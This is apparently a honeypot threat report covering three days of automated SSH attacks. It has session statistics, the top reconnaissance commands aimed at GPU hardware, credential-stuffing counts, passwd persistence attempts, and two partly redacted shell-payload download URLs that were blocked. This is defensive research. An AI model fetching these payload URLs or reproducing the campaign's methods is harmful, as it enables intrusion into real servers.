Global figures for the period

28.112
SSH sessions
151
Unique IPs
360
Unique usernames tried
22.647
Commands logged
2026-06-11 — 2026-06-13
Active period

Types of events logged

Event typeCountDescription
connection30.211SSH authentication attempts
command22.647Commands executed in interactive sessions
credential_probe / probeProbes without complete credentials

SSH clients: mass automation

SSH clientConnections% of total
SSH-2.0-Go (escáner principal)27.94299,5%
PuTTY440,16%
OpenSSH100,04%
libssh100,04%
Otros710,25%

Most frequent commands

The command distribution reveals the main objective of the dominant campaign: GPU hardware reconnaissance.

#CommandExecutions% of total
1lspci7.06531,2%
2uname6.95430,7%
3nvidia-smi4.48019,8%
4uptime2.35610,4%
5echo9674,3%

Sessions without commands: authentication only

Pure credential stuffing sessions

5,465 sessions (19.4% of the total) executed no commands at all — they only authenticated and disconnected. These are credential-validation sessions: the scanner tries the username/password pair and, if it fails, moves on to the next. If it succeeds, it saves the valid credentials for a second exploitation phase.

Payloads and download attempts

Observed payload URLs

https://14.46.[REDACTED].77/sh — 1 attempt + 1 download (0 bytes executed)

http://[REDACTED].sh/x — 3 attempts + 3 downloads (0 bytes executed)

All execution attempts were blocked — the payload never ran on the real host.

Sessions with privilege escalation attempts

Password change attempts

104 sessions (0.4% of the total) ran the passwd command — attempts to change the root password to establish persistence without installing any binary.

Conclusion

Our honeypot captures a clear picture of the active threat on the internet: a well-organized automated campaign, aimed at blockchain infrastructure, operating with custom Go tooling and specialized dictionaries. The 151 recorded IPs are not independent — they are nodes of a single operation with a division of tasks.

What sets this analysis apart from generic "SSH attacks" statistics: granularity. We don't just know how many attacks there were — we know which credentials they tried, which commands they ran, what hardware they were looking for and how they tried to erase their tracks.

Data collected for cybersecurity research purposes. All information comes from unsolicited activity recorded on our own infrastructure.

Data source · live update
honeypot CipherSentry · period: 2026-06-11 — 2026-06-13
← All articles